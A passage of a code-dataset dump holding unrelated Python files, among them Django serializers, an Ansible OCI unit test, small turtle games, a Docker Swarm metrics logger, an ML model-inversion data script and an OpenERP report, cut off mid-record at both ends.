'id',\n 'created', 'user'\n )\n\n def create(self, validated_data):\n validated_data['user'] = self._kwargs['context']['request'].user\n return super().create(validated_data)\n\n def get_photo_url(self, obj):\n return self._get_aws_base64(obj.photo) if obj.photo else None\n\n def get_thumb_url(self, obj):\n return self._get_aws_base64(obj.thumbnail) if obj.thumbnail else None\n\n def get_evolution_width(self, obj):\n return obj.width\n\n def get_evolution_height(self, obj):\n return obj.height\n\n\nclass WoundSerializer(FileValidationMixin, AwsUrlMixin, serializers.ModelSerializer):\n photo = serializers.CharField(write_only=True, required=False, allow_null=True)\n width = serializers.DecimalField(write_only=True, max_digits=5, decimal_places=2)\n height = serializers.DecimalField(write_only=True, max_digits=5, decimal_places=2)\n first_width = serializers.SerializerMethodField()\n first_height = serializers.SerializerMethodField()\n photo_url = serializers.SerializerMethodField()\n thumb_url = serializers.SerializerMethodField()\n file_id = serializers.CharField(write_only=True)\n file = serializers.CharField(source='file.file_id', read_only=True)\n treatment = serializers.SerializerMethodField()\n user = UserSerializer(read_only=True)\n\n class Meta:\n model = Wound\n fields = (\n 'id', 'name', 'type', 'localization', 'is_cured', 'photo', 'width', 'height', 'first_width',\n 'first_height', 'photo_url', 'thumb_url', 'file', 'file_id', 'created', 'treatment', 'comment', 'user'\n )\n\n def create(self, validated_data, **kwargs):\n data = {\n 'photo': validated_data.pop('photo', None),\n 'width': validated_data.pop('width'),\n 'height': validated_data.pop('height')\n }\n validated_data['user'] = self._kwargs['context']['request'].user\n wound = super().create(validated_data)\n data.update({'wound': wound.pk})\n serializer = EvolutionSerializer(data=data, context=self._kwargs['context'])\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return wound\n\n def get_first_width(self, obj):\n last = obj.evolution_set.last()\n if last:\n return last.width\n\n def get_first_height(self, obj):\n last = obj.evolution_set.last()\n if last:\n return last.height\n\n def get_photo_url(self, obj):\n last = obj.evolution_set.last()\n if last and last.photo:\n return self._get_aws_base64(last.photo)\n\n def get_thumb_url(self, obj):\n last = obj.evolution_set.last()\n if last and last.thumbnail:\n return self._get_aws_base64(last.thumbnail)\n\n def get_treatment(self, obj):\n task = obj.schedule_set.first()\n if task:\n return task.pk\n","sub_path":"lifeline-backend-master/apps/wounds/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"397622021","text":"# Copyright (c) 2018, Oracle and/or its affiliates.\n# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n# Apache License v2.0\n# See LICENSE.TXT for details.\n\nimport pytest\nfrom nose.plugins.skip import SkipTest\nimport logging\nfrom ansible.modules.cloud.oracle import oci_load_balancer_backend_facts\nfrom ansible.module_utils.oracle import oci_utils\n\ntry:\n import oci\n from oci.load_balancer.models import Backend\n from oci.exceptions import ServiceError\nexcept ImportError:\n raise SkipTest(\n \"test_oci_load_balancer_backend_facts.py requires `oci` module\")\n\n\nclass FakeModule(object):\n def __init__(self, **kwargs):\n self.params = kwargs\n\n def fail_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n raise Exception(kwargs['msg'])\n\n def exit_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n\n\n@pytest.fixture()\ndef lb_client(mocker):\n mock_lb_client = mocker.patch(\n 'oci.load_balancer.load_balancer_client.LoadBalancerClient')\n return mock_lb_client.return_value\n\n\n@pytest.fixture()\ndef list_all_resources_patch(mocker):\n return mocker.patch.object(oci_utils, 'list_all_resources')\n\n\ndef setUpModule():\n logging.basicConfig(filename='/tmp/oci_ansible_module.log',\n filemode='a', level=logging.INFO)\n oci_load_balancer_backend_facts.set_logger(logging)\n\n\ndef test_list_load_balancer_backends_specific_backend(lb_client):\n module = get_module(dict({'backend_set_name': 'backend1',\n 'load_balancer_id': 'ocid1.lodbalancer.xcds', 'ip_address': '10.12.15.121', 'port': '8080'}))\n lb_client.get_backend.return_value = get_response(\n 200, None, get_backend(), None)\n result = oci_load_balancer_backend_facts.list_load_balancer_backends(lb_client, module)\n assert result['backends'][0]['ip_address'] is get_backend().ip_address\n \n\ndef test_list_load_balancer_backends_all_backends(lb_client, list_all_resources_patch):\n module = get_module(dict({'backend_set_name': 'backend1',\n 'load_balancer_id': 'ocid1.lodbalancer.xcds'}))\n list_all_resources_patch.return_value = [get_backend()]\n result = oci_load_balancer_backend_facts.list_load_balancer_backends(lb_client, module)\n assert result['backends'][0]['ip_address'] is get_backend().ip_address\n\ndef test_list_load_balancer_backends_service_error(lb_client, list_all_resources_patch):\n error_message = 'Internal Server Error'\n module = get_module(dict({'backend_set_name': 'backend1',\n 'load_balancer_id': 'ocid1.lodbalancer.xcds'}))\n list_all_resources_patch.side_effect = ServiceError(\n 500, 'InternalServerError', dict(), error_message)\n try:\n oci_load_balancer_backend_facts.list_load_balancer_backends(lb_client, module)\n except Exception as ex:\n assert error_message in ex.args[0]\n\n\n\n\ndef get_backend():\n backend = Backend()\n backend.name = \"10.159.34.21:8181\"\n backend.backup = True\n backend.drain = True\n backend.offline = True\n backend.weight = 5\n backend.ip_address = \"10.159.34.21\"\n backend.port = \"8181\"\n return backend\n\ndef get_response(status, header, data, request):\n return oci.Response(status, header, data, request)\n\ndef get_module(additional_properties):\n params = dict()\n params.update(additional_properties)\n module = FakeModule(**params)\n return module\n","sub_path":"ansible-scripts/test/units/test_oci_load_balancer_backend_facts.py","file_name":"test_oci_load_balancer_backend_facts.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"119305126","text":"from __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport os, shutil\r\nfrom dataset_utils import load_blackbox\r\nimport numpy as np\r\nimport pickle\r\n\r\n# Training settings\r\nparser = argparse.ArgumentParser(description='Auxiliary Information construction')\r\n# parser.add_argument('--batch-size', type=int, default=128, metavar='')\r\n# parser.add_argument('--test-batch-size', type=int, default=1000, metavar='')\r\n# parser.add_argument('--epochs', type=int, default=100, metavar='')\r\n# parser.add_argument('--lr', type=float, default=0.01, metavar='')\r\n# parser.add_argument('--momentum', type=float, default=0.5, metavar='')\r\nparser.add_argument('--no-cuda', action='store_true', default=False)\r\nparser.add_argument('--seed', type=int, default=1, metavar='')\r\n# parser.add_argument('--log-interval', type=int, default=10, metavar='')\r\nparser.add_argument('--nc', type=int, default=1)\r\nparser.add_argument('--ndf', type=int, default=128)\r\nparser.add_argument('--ngf', type=int, default=128)\r\nparser.add_argument('--nz', type=int, default=530)\r\nparser.add_argument('--truncation', type=int, default=530)\r\nparser.add_argument('--c', type=float, default=50.)\r\nparser.add_argument('--num_workers', type=int, default=1, metavar='')\r\nparser.add_argument('--auxiliary', type=int, default=100)\r\n\r\ndef get_inversion_data(model, label, quantity, nz=530):\r\n # add Gaussian noise\r\n Gaussian_noise = abs(np.random.normal(0.0, 0.1, (quantity, nz)))\r\n for i in range(quantity):\r\n Gaussian_noise[i][label] += 1.0\r\n\r\n input_vector = torch.from_numpy(Gaussian_noise)\r\n input_vector = input_vector.float()\r\n results = model(input_vector).cpu()\r\n auxiliary_data = []\r\n for i in range(quantity):\r\n data = (results[i].detach().numpy(), input_vector[i])\r\n auxiliary_data.append(data)\r\n return auxiliary_data\r\n\r\ndef main():\r\n args = parser.parse_args()\r\n print(\"================================\")\r\n print(args)\r\n print(\"================================\")\r\n os.makedirs('models/adversary/', exist_ok=True)\r\n\r\n use_cuda = not args.no_cuda and torch.cuda.is_available()\r\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\r\n kwargs = {'num_workers': args.num_workers, 'pin_memory': True} if use_cuda else {}\r\n\r\n torch.manual_seed(args.seed)\r\n inversion = load_blackbox('inversion.pth', args=args, device=device)\r\n auxiliary = []\r\n for i in range(args.nz):\r\n auxiliary.extend(get_inversion_data(inversion, i, args.auxiliary, args.nz))\r\n np.random.shuffle(auxiliary)\r\n pickle.dump(auxiliary, open('models/adversary/transferset.pickle','wb'))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"construct_auxiliary.py","file_name":"construct_auxiliary.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"373912479","text":"import turtle, random,time\nturtle.bgpic(\"seabg.png\")#background as a picture\nturtle.setup(1800,1200)#size of the screen\nturtle.penup()\nturtle.tracer(1,0)\nturtle.goto(0,300)\nturtle.hideturtle()\nturtle.write(\"Welcome if you wanna play press space\", align=\"center\", font =(\"Ariel\" , 40, \"normal\"))\nscore=0\ndirection = \"up\"\n\n# set up turtles\nturtle.register_shape(\"coin.gif\")#make the turtle as a coin\ncoin = turtle.clone()#main that every thing that turtle was now coin are\ncoin.shape(\"coin.gif\")\ncoin.speed(0)#the fastest speed\ncoin.penup()\ncoin.hideturtle()\ncoin2 = coin.clone()#make the seconed coin as same as the first one\ncoin2.speed(0)\ncoin2.hideturtle()\ncoin3 = coin.clone()\ncoin3.speed(0)\ncoin3.hideturtle()\n\njfish = turtle.Turtle()\nturtle.register_shape(\"jfish.gif\")#make the turtle as a cjfish\njfish.shape(\"jfish.gif\")\njfish.penup()\njfish.hideturtle()\njfish.speed(0)\njfish2 = jfish.clone()#make the seconed jfish as same as the first one\njfish3 = jfish.clone()\n\n\ntrash = turtle.Turtle()\nturtle.register_shape(\"plasticbag.gif\")\ntrash.shape(\"plasticbag.gif\")\ntrash.hideturtle()\ntrash.penup()\ntrash2=trash.clone()\ntrash3=trash.clone()\n\ndef make():#make the coin\n global coin,score,coin2,coin3,jfish,jfish2,jfish3\n y_pos = random.randint(-12,12)*40#set the random \"y\"\n coin.goto(500,y_pos)\n coin.showturtle()\n coin2.goto(500, random.randint(-12, 12)*40)\n coin2.showturtle()\n coin3.goto(500, random.randint(-12, 12)*40)\n coin3.showturtle()\n print(\"Making jellyfish!\")\n y_pos = random.randint(-12,12)*40#set the random \"y\"\n print(\"First random y position: \" + str(y_pos))\n\n jfish.goto(500, random.randint(-12, 12)*40)#jfish go th the start pos\n jfish.showturtle()\n jfish.speed(0)\n jfish2.goto(500, random.randint(-12, 12)*40)\n jfish2.showturtle()\n jfish3.goto(500, random.randint(-12, 12)*40)\n jfish3.showturtle()\n\n trash.goto(500, random.randint(-12, 12)*40)#jfish go th the start pos\n trash.showturtle()\n trash.speed(0)\n trash2.goto(500, random.randint(-12, 12)*40)\n trash2.showturtle()\n trash2.speed(0)\n trash3.goto(500, random.randint(-12, 12)*40)\n trash3.showturtle()\n trash3.speed(0)\n \ndef move():\n global score,jfish,jfish2,jfish3,coin,coin2,coin3\n jfish.back(8)\n coin.back(8)\n coin2.back(8)\n coin3.back(8)\n jfish2.back(8)\n jfish3.back(8)\n trash.back(8)\n trash2.back(8)\n trash3.back(8)\n if coin.pos()[0]==-500 or coin2.pos()[0]==-500 or coin3.pos()[0]==-500: #check if the jfish is in the same x as the sea turtle\n if abs(coin.pos()[1] - seat.pos()[1]) <= 40 or abs(coin2.pos()[1] - seat.pos()[1]) <= 40 or abs(coin3.pos()[1] - seat.pos()[1]) <= 40:#check if the sea t in the range of the coin\n print(\"you caught the coin\")\n score-=75\n turtle.clear()\n turtle.write(score ,move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\"))#cahnge the score\n make()#the coins +jfish return to the start\n if score <= -100:\n turtle.clear()\n turtle.write(\"Game over! your score is \" +str(score) , move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n time.sleep(5)\n turtle.clear()\n score=0\n turtle.write(\"Restart\", move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n \n \n if jfish.pos()[0]==-500 or jfish2.pos()[0]==-500 or jfish3.pos()[0]==-500: #check if the jfish is in the same x as the sea turtle\n print(\"you caught the jellyfish\")\n if abs(jfish.pos()[1] - seat.pos()[1]) <= 80 or abs(jfish2.pos()[1] - seat.pos()[1]) <= 80 or abs(jfish3.pos()[1] - seat.pos()[1]) <= 80:#check if the sea t in the range of the jfish\n score+=150\n turtle.clear()\n turtle.write(score , move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n make()\n if trash.pos()[0]==-500 or trash2.pos()[0]==-500:\n if abs(trash.pos()[1] - seat.pos()[1]) <= 80 or abs(trash2.pos()[1] - seat.pos()[1]) <= 80:#check if the sea t in the range of the jfish\n turtle.clear()\n turtle.write(\"Game over! your score is \" +str(score) , move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n time.sleep(5)\n turtle.clear()\n score=0\n turtle.write(\"Restart\", move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n if jfish.pos()[0] <-850:\n make()\n \n turtle.ontimer(move, 10)\n\ndef game():\n #if the player presses the space button then the game begins\n global seat,score,direction\n turtle.clear()\n turtle.register_shape(\"seat.gif\")\n seat = turtle.clone()\n seat.showturtle()\n seat.shape(\"seat.gif\")\n seat.penup()\n seat.goto(-500,0)\n make()\n move()\n\ndef up():\n #if the player presses the up button then it'll go up\n global seat,score, direction #every change with this var will stay for the game\n direction = \"up\"\n \n pos_list = seat.pos()\n x_pos = pos_list[0]\n y_pos = pos_list[1]\n seat.goto(x_pos, y_pos+40)\n print(\"you pressed the up key!\")\n x_pos = pos_list[0]\n y_pos = pos_list[1]\n\n print(\"New y pos:\")\n print(y_pos)\n \n if y_pos>480 or y_pos<-480:\n turtle.clear()\n turtle.write(\"GAME OVER\" ,move=False, align=\"center\", font=(\"Ariel\",50,\"normal\"))\n time.sleep(1)\n turtle.clear()\n score=0\n turtle.write(\"Restart\", move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\"))\n time.sleep(1)\n turtle.clear()\n seat.goto(x_pos,y_pos-100)\n\n \ndef down():\n #if the player presses the down button then it'll go down\n global seat,down_e,up_e,score\n direction = \"down\"\n pos_list = seat.pos()\n x_pos = pos_list[0]\n y_pos = pos_list[1]\n seat.goto(x_pos, y_pos-40)\n x_pos = pos_list[0]\n y_pos = pos_list[1]\n print(\"you pressed the down key!\")\n if y_pos>480 or y_pos<-480:#what happened when your downer thn the edge\n turtle.clear()\n turtle.write(\"GAME OVER\" ,move=False, align=\"center\", font=(\"Ariel\",50,\"normal\"))\n time.sleep(1)\n turtle.clear()\n score=0\n turtle.write(\"Restart\", move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\"))\n time.sleep(1)\n turtle.clear()\n seat.goto(x_pos,y_pos+100) \n \n \n \n#main program\nup_e=500\ndown_e=-500\n\nturtle.onkeypress(game, \"space\")\nturtle.onkeypress(up, \"Up\")\nturtle.onkeypress(down,\"Down\")\nturtle.listen()\nlines= turtle.clone()\nlines.hideturtle()\nlines.penup()\nlines.goto(-860,500)\nlines.speed(0)\nfor i in range(2):\n lines.pendown()\n lines.pensize(5)\n lines.forward(1700)\n lines.right(90)\n lines.forward(1000)\n lines.right(90)\n\n\n \n\nup_e=500\ndown_e=-500\n\nturtle.mainloop()\n\n\n\n\n\n\n\n","sub_path":"final_proj.py","file_name":"final_proj.py","file_ext":"py","file_size_in_byte":6811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"192365594","text":"# -*- coding: utf-8 -*-\nimport json\nimport requests\nimport time, datetime\nfrom urllib.request import urlopen\nimport settings, getMetrics\n\nif __name__ == '__main__':\n # get all NodeIDs in swarm\n nodes = {}\n print(\"Nodes:\")\n for node in settings.nodes_list:\n with urlopen(\"http://{node}/info\".format(node=node)) as url:\n data = json.loads(url.read().decode())\n nodes[data[\"Swarm\"][\"NodeID\"]] = node\n print('''\\t NodeID: {} '''.format(\n data[\"Swarm\"][\"NodeID\"], ))\n\n # list all the services\n services = {}\n with urlopen(\"http://{manager}/services\".format(manager=settings.manager)) as url:\n data = json.loads(url.read().decode())\n print(\"Services:\")\n for service in data:\n services[service[\"Spec\"][\"Name\"]] = {\"name\": service[\"Spec\"][\"Name\"], \"tasks\": []}\n print('''\\t name: {}, version: {}, replicas: {} '''.format(\n service[\"Spec\"][\"Name\"],\n service[\"Version\"][\"Index\"],\n service[\"Spec\"][\"Mode\"][\"Replicated\"][\"Replicas\"]))\n\n # get the tasks running on our swarm cluster\n for service_name, service in services.items():\n settings.get_tasks(service)\n\n # cpu usage api is not fast. be patient!\n # here we consistently get the cpu usage of all the web-workers and calculate the average\n\n R_ = settings.target_response_time\n\n start_time = datetime.datetime.now()\n time_limit = datetime.timedelta(seconds=4300)\n print(\"let's get started\")\n with open(\"dataop-pi_data-gathering_%s.csv\" %(start_time.strftime(\"%Y-%m-%d_%H-%M-%S\")), \"w\") as f:\n while True:\n\n now_time = datetime.datetime.now()\n if now_time - start_time >= time_limit:\n break\n\n Uw_cpu = getMetrics.calculate_cpu_utilization(nodes, services[\"web-worker\"])\n Xw = getMetrics.calculate_data_incoming_rate(nodes, services[\"web-worker\"])\n data = [now_time.strftime(\"%Y-%m-%d %H:%M:%S\"), str(Uw_cpu), str(Xw)]\n hehe = \",\".join(data)\n print(hehe)\n f.write(hehe + \"\\n\")\n\n '''Um_cpu = getMetrics.calculate_cpu_utilization(nodes, services[\"mysql\"])\n Xm = getMetrics.calculate_data_incoming_rate(nodes, services[\"mysql\"])\n data = [now_time.strftime(\"%Y-%m-%d %H:%M:%S\"), str(Um_cpu), str(Xm)]\n hehe = \",\".join(data)\n print(hehe)\n f.write(hehe + \"\\n\")'''\n\n time.sleep(5)","sub_path":"Project/system/dataGathering.py","file_name":"dataGathering.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"510228163","text":"import numpy as np\nimport pandas as pd\n\nfrom functions import softmax\nfrom model import FCLayer\nfrom nets import net1, net2, net3\n\n\ndef calc_grad(net):\n fc_layers = [x for x in net.layers if isinstance(x, FCLayer)]\n\n def load_data(w_path, b_path, name, has_index=True):\n w_path = w_path + '{}.csv'.format(name)\n\n weights = pd.read_csv(w_path, header=None, index_col=0 if has_index else None).values\n weights = np.array_split(weights, np.cumsum([x.W.shape[0] for x in fc_layers]))\n\n b_path = b_path + '{}.csv'.format(name)\n biases = pd.read_csv(b_path, header=None, index_col=0 if has_index else None).values\n biases = np.array_split(biases, len(net.layers))\n return weights, biases\n\n # load_data\n prefix = '../../input/Question_2_2/c/'\n given_weights, given_biases = load_data(prefix + 'w-', prefix + 'b-', net.name)\n for layer, weight in zip(fc_layers, given_weights):\n assert (layer.W.shape[0] == weight.shape[0])\n layer.W = weight[:, :layer.W.shape[1]]\n\n for layer, bias in zip(fc_layers, given_biases):\n bias = bias.flatten()\n layer.b = bias[:layer.b.shape[0]]\n\n # input\n X = [-1, 1, 1, 1, -1, -1, 1, -1, 1, 1, -1, -1, 1, 1]\n score = net.forward_propagate(X)\n prob = softmax(score)\n label = 3\n one_hot = np.array([1 if x == label else 0 for x in range(4)])\n # calculate gradients\n net.back_propagate(prob - one_hot)\n\n for layer in fc_layers:\n dw_file = '../../output/Question_2/dw-{}.csv'.format(net.name)\n db_file = '../../output/Question_2/db-{}.csv'.format(net.name)\n pd.DataFrame(layer.dW).to_csv(dw_file, mode='a', header=False, index=False)\n pd.DataFrame(layer.db.reshape(1, -1)).to_csv(db_file, mode='a', header=False, index=False)\n\n\ncalc_grad(net1)\ncalc_grad(net2)\ncalc_grad(net3)\n","sub_path":"assignment1/code/q2/calc_grad.py","file_name":"calc_grad.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"307241150","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# HLVSolution, Open Source Management Solution\n#\n##############################################################################\n\nimport time\nfrom report import report_sxw\nimport pooler\nfrom osv import osv\nfrom tools.translate import _\nimport random\nfrom datetime import datetime\nDATETIME_FORMAT = \"%Y-%m-%d %H:%M:%S\"\nDATE_FORMAT = \"%Y-%m-%d\"\n\nclass Parser(report_sxw.rml_parse):\n \n def __init__(self, cr, uid, name, context):\n super(Parser, self).__init__(cr, uid, name, context=context)\n pool = pooler.get_pool(self.cr.dbname)\n self.start_date = False\n self.end_date = False\n self.company_name = False\n self.company_address = False\n self.warehouse = False\n self.warehouse_id = False\n self.product_id = False\n self.product = False\n self.product_code = False\n \n self.vat = False\n self.get_company(cr, uid)\n self.localcontext.update({\n 'get_vietname_date':self.get_vietname_date, \n 'get_line':self.get_line,\n 'get_header':self.get_header,\n 'get_start_date':self.get_start_date,\n 'get_end_date':self.get_end_date,\n 'get_company_name':self.get_company_name,\n 'get_company_address':self.get_company_address,\n 'get_company_vat':self.get_company_vat,\n 'get_warehouse':self.get_warehouse,\n 'get_current_time':self.get_current_time,\n 'get_product':self.get_product,\n 'get_product_code':self.get_product_code,\n })\n \n def get_company(self,cr,uid):\n user_obj = self.pool.get('res.users').browse(cr,uid,uid)\n self.company_name = user_obj and user_obj.company_id and user_obj.company_id.name or ''\n self.company_address = user_obj and user_obj.company_id and user_obj.company_id.street or ''\n self.vat = user_obj and user_obj.company_id and user_obj.company_id.vat or ''\n \n def get_company_name(self):\n return self.company_name\n \n def get_current_time(self):\n date = time.strftime(DATETIME_FORMAT)\n date = datetime.strptime(date, DATETIME_FORMAT) \n return date.strftime('%d-%m-%Y %H:%M:%S')\n \n def get_company_address(self):\n return self.company_address \n \n def get_company_vat(self):\n return self.vat \n \n def get_header(self):\n wizard_data = self.localcontext['data']['form']\n self.start_date = wizard_data['date_start']\n self.end_date = wizard_data['date_end']\n self.warehouse = wizard_data['warehouse_id'][1] or ''\n self.warehouse_id = wizard_data['warehouse_id'][0] or ''\n self.product_id = wizard_data['product_id'][0] or ''\n self.product = wizard_data['product_id'][1] or ''\n product_obj = self.pool.get('product.product').browse(self.cr,self.uid,self.product_id)\n self.product_code = product_obj and product_obj.default_code or''\n \n def get_warehouse(self):\n return self.warehouse\n \n def get_product(self):\n return self.product\n \n def get_product_code(self):\n return self.product_code \n \n def get_start_date(self):\n self.get_header()\n return self.get_vietname_date(self.start_date) \n \n def get_end_date(self):\n return self.get_vietname_date(self.end_date) \n \n def get_vietname_date(self, date):\n if not date:\n date = time.strftime(DATE_FORMAT)\n date = datetime.strptime(date, DATE_FORMAT)\n return date.strftime('%d/%m/%Y')\n \n def get_line(self):\n wizard_data = self.localcontext['data']['form']\n res =[]\n sql = '''\n SELECT * FROM fn_cash_book_report(%s,'%s','%s')\n ''' %(self.account_id,self.start_date,self.end_date)\n self.cr.execute(sql)\n for line in self.cr.dictfetchall():\n bal_amount = line['bal_amount'] and line['bal_amount'] or ''\n description = line['description'] and line['description'] or ''\n if lang=='e' and line['bold_flag'] == True:\n description = line['translate_des'] and line['translate_des'] or '',\n \n if line['bold_flag'] == True:\n bal_amount = line['bal_amount'] and line['bal_amount'] or 0\n \n pay_num = line['pay_num'] or line['rec_num'] or ''\n \n res.append({\n 'gl_date':line['gl_date'] and self.get_vietname_date(line['gl_date']) or '',\n 'document_date':line['document_date'] and self.get_vietname_date(line['document_date']) or '',\n 'rec_num':pay_num,\n 'description':description,\n 'pay_amount':line['pay_amount'] and line['pay_amount'] or '',\n 'rec_amount':line['rec_amount'] and line['rec_amount'] or '',\n 'bal_amount':bal_amount,\n 'bold_flag':line['bold_flag'] and line['bold_flag'] or False\n })\n return res\n \n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"addons-deploy/general_report_warehouse/report/general_stock_ledger.py","file_name":"general_stock_ledger.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"340139178","text":"import random\n\n# Get the user's guess\n# Params: None\n# Returns: Integer\n#\ndef get_guess():\n\n # Get initial guess\n guess = raw_input('Enter your guess: ')\n\n # Assume it's not valid, until it's proven otherwise\n valid = False\n\n while valid != True:\n\n try:\n # Try and convert this number to an integer\n # If it fails, the exception will occur\n guess = int(guess)\n except Exception:\n # Exception was thrown when trying to convert to number,\n # Report the issue and ask again\n print('Invalid input; please enter a whole number.')\n valid = False\n guess = get_guess()\n\n # If they get here, it means the number must have been valid\n # Set valid to be true to break out of the while loop\n valid = True\n\n return guess\n\n\ndef compare(numA, numB):\n if numA > numB:\n return 'high'\n elif numB > numA:\n return 'low'\n\n# main function\n# Param: low and high limits\n# Returns: String result\ndef play(lowNum, highNum):\n secret_number = random.randint(lowNum, highNum)\n \n print('number is ' + str(secret_number))\n \n print('\\nI\\'m thinking of a number between ' + str(lowNum) + ' and ' + str(highNum) + ', what do you think it is?')\n \n guess = int(get_guess())\n count = 1\n while guess != secret_number:\n print('Too ' + compare(guess, secret_number) + '. Guess again.')\n guess = int(get_guess())\n count = count + 1\n print('You got it! Secret number was ' + str(secret_number))\n print('It took you ' + str(count) + ' guesses.')\n \nplay(1,10)","sub_path":"mosthighleveldir/guessagain.py","file_name":"guessagain.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"290309185","text":"import turtle\nturtle.goto(0,0)\nturtle.tracer(1,0)\n\nturtle.direction= None \n\ndef up():\n turtle.direction = \"Up\"\n print('you pressed the up key.')\n on_move()\n\ndef down():\n turtle.direction='Down'\n print('you pressed the down button')\n on_move()\n\ndef left():\n turtle.direction='Left'\n print('you pressed the left button')\n on_move()\ndef right():\n turtle.direction='Right'\n print('you pressed the right button')\n on_move()\n \npixel_move=20\n\ndef on_move():\n turtle.position()\n x_pos=turtle.xcor()\n y_pos=turtle.ycor()\n if turtle.direction=='Up':\n turtle.goto(x_pos,y_pos+pixel_move)\n turtle.seth(90)\n elif turtle.direction=='Left':\n turtle.goto(x_pos-pixel_move,y_pos)\n turtle.seth(180)\n elif turtle.direction=='Right':\n turtle.goto(x_pos+pixel_move,y_pos)\n turtle.seth(0)\n else:\n turtle.goto(x_pos,y_pos-pixel_move)\n turtle.seth(270)\n \n \n\nturtle.onkey(up, \"Up\")\nturtle.onkey(down,'Down')\nturtle.onkey(left,'Left')\nturtle.onkey(right,'Right')\n##turtle.goto(0,0)\nturtle.listen()\n\n\n\nturtle.mainloop()\n","sub_path":"fun2.py","file_name":"fun2.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"400552145","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport model_utils.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Deployment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('url', models.CharField(max_length=600)),\n ('email', models.EmailField(max_length=75)),\n ('deploy_id', models.CharField(max_length=100)),\n ('remote_container_id', models.CharField(max_length=64)),\n ('remote_app_id', models.CharField(max_length=100, blank=True)),\n ('launch_time', models.DateTimeField(null=True, blank=True)),\n ('expiration_time', models.DateTimeField(null=True, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('status', models.CharField(default=b'Deploying', max_length=50, choices=[(b'Deploying', b'Deploying'), (b'Completed', b'Completed'), (b'Failed', b'Failed'), (b'Expired', b'Expired')])),\n ('reminder_mail_sent', models.BooleanField(default=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DeploymentErrorLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('http_status', models.CharField(max_length=3)),\n ('error_log', models.TextField()),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('deployment', models.OneToOneField(related_name='error_log', to='deployment.Deployment')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('github_url', models.CharField(max_length=200)),\n ('image_name', models.CharField(max_length=300)),\n ('ports', models.CharField(help_text=b'Internally exposed ports separated by spaces, example: 80 8080', max_length=300)),\n ('hostnames', models.CharField(help_text=b'Hostnames separated by spaces, needed when multiple ports are exposed, example: lms cms', max_length=300, blank=True)),\n ('env_vars', models.CharField(help_text=b'Space separated environment variables, example: key1=val1 key2=val2', max_length=500, blank=True)),\n ('number_of_cpus', models.DecimalField(null=True, max_digits=4, decimal_places=2, blank=True)),\n ('amount_of_ram', models.PositiveIntegerField(null=True, verbose_name=b'Amount of RAM in MB', blank=True)),\n ('trial_duration', models.IntegerField(help_text=b'Trial duration in minutes', null=True, blank=True)),\n ('unconfirmed_trial_duration', models.IntegerField(help_text=b'Trial duration in minutes', null=True, blank=True)),\n ('slug', models.SlugField(max_length=40, null=True, blank=True)),\n ('status', model_utils.fields.StatusField(default=b'Inactive', max_length=100, no_check_for_status=True, choices=[(b'Active', b'Active'), (b'Hidden', b'Hidden'), (b'Inactive', b'Inactive')])),\n ('default_username', models.CharField(max_length=30, blank=True)),\n ('default_password', models.CharField(max_length=30, blank=True)),\n ('survey_form_url', models.URLField(blank=True)),\n ],\n options={\n 'ordering': ['name'],\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='deployment',\n name='project',\n field=models.ForeignKey(related_name='deployments', to='deployment.Project'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='deployment',\n name='user',\n field=models.ForeignKey(related_name='deployments', 